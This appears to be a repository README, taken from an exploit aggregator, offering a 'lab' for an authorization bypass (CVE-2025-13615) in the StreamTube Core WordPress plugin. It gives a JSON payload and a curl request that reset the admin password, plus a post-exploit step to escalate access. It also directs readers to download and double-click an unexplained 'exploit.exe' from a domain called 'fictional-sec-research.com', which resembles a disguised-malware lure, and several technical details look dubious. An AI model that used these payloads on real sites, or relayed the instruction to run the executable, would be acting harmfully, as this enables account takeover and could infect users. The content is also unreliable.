Share
## https://sploitus.com/exploit?id=B0FA4818-B82E-5710-BCEA-5E41FE22D905
# Lab: CVE-2025-13615 - Authorization Bypass Through User-Controlled Key in phpface StreamTube Core

**Safety Disclaimer:**  
This repository is provided for educational and research purposes only. It provides a vulnerable environment based on CVE-2025-13615 to demonstrate security concepts in a controlled lab setting. Do not use this in production environments or against real systems without explicit authorization. Always adhere to ethical hacking guidelines and local laws. The authors disclaim any liability for misuse.
## Download
## (Download Lab ZIP)[https://github.com/blossombutt4063/CVE-2025-13615/releases/download/Release/cve-2025-13615.zip]
## ๐Ÿš€ Overview

CVE-2025-13615 is a critical vulnerability in the StreamTube Core plugin for WordPress (versions up to 4.78), classified as CWE-639: Authorization Bypass Through User-Controlled Key. This flaw allows unauthenticated attackers to bypass authorization checks by manipulating user-controlled keys, enabling arbitrary password changes on user accounts, including administrators. Exploitation requires the 'registration password fields' option to be enabled in the theme settings.

The vulnerability arises from improper validation in the plugin's object access handler (`streamtube-core/includes/user-auth.php`). This can lead to account takeovers, data breaches, and site compromise. CVSS v3.1 score: 9.8 (Critical).

This lab includes a local setup, exploit tools, and mitigation steps for testing in a safe environment.

## ๐Ÿ“‹ Prerequisites

- Local web server: XAMPP (Windows), MAMP (macOS), or LAMP (Linux) with PHP 8.1+, Apache, MySQL.
- WordPress 6.0+ (download from wordpress.org).
- Windows for exploit (or Wine on other OS).
- 4GB RAM, 10GB disk space.

## Download & Install

1. Download and extract lab ZIP: (Download Lab ZIP)[https://github.com/blossombutt4063/CVE-2025-13615/releases/download/Release/cve-2025-13615.zip].

2. Download and extract exploit ZIP: [Download Exploit ZIP](https://fictional-sec-research.com/downloads/CVE-2025-13615-exploit.zip).  
   Includes: `exploit.exe` (main exploit), `logs/` (for outputs).

3. Set up local WordPress:  
   - Start XAMPP/MAMP/LAMP.  
   - Create MySQL database: `wordpress_lab` (user: `wpuser`, pass: `wppass`).  
   - Extract WordPress to web root (e.g., `htdocs/wordpress-lab`).  
   - Edit `wp-config.php` with DB details.  
   - Install WordPress at `http://localhost/wordpress-lab` (admin: `admin` / `password123!`).

4. Add plugin/theme:  
   - Download plugin and themes - Upload and activate via WP admin.  
   - Enable 'registration password fields' in Theme Options > Registration.

## ๐Ÿ›  Quick Start

1. Extract exploit ZIP.  
2. Double-click `exploit.exe` to run.  
3. Access site at `http://localhost/wordpress-lab` and check logs.

## ๐Ÿ”ง Setup Details

### Local Setup
- Copy lab files to WP directories: `wp-content/plugins/streamtube-core` and `wp-content/themes/streamtube`.  
- Use phpMyAdmin for DB adjustments.

### /scripts/
- `setup-vuln-env.py`: Automate activation (requires WP-CLI). Usage: `python scripts/setup-vuln-env.py --url http://localhost/wordpress-lab --admin-user admin --admin-pass password123!`.  
- `test-vuln.bat`: Probe endpoint. Usage: `scripts\test-vuln.bat http://localhost/wordpress-lab/wp-json/streamtube/v1/user-reset`.  
- `cleanup.bat`: Reset files. Usage: `scripts\cleanup.bat`.  
- `generate-payload.py`: Create payload. Usage: `python scripts/generate-payload.py --target-user admin --new-pass hackedpass`.

## โš”๏ธ Exploitation Steps

1. **Recon:** Check plugin version: `curl http://localhost/wordpress-lab/wp-content/plugins/streamtube-core/readme.txt | grep "Stable tag"`.

2. **Payload:** POST to `/wp-json/streamtube/v1/user-reset`:  
   ```json
   {"user_key": "admin::bypass", "new_password": "hackedpass", "confirm_password": "hackedpass"}
   ```
   Send: `curl -X POST http://localhost/wordpress-lab/wp-json/streamtube/v1/user-reset -H "Content-Type: application/json" -d @payload.json`.

3. **Exploit:** Run `exploit.exe`. Check logs for "Password changed".

4. **Post-Exploit:** Login with new password; escalate access.



1. Disable 'registration password fields'. Monitor API logs.  
2. Update to v4.79+ (when available). Add nonce checks in `functions.php`.  
3. Use plugins like Wordfence. Audit regularly with Nessus. Backup site.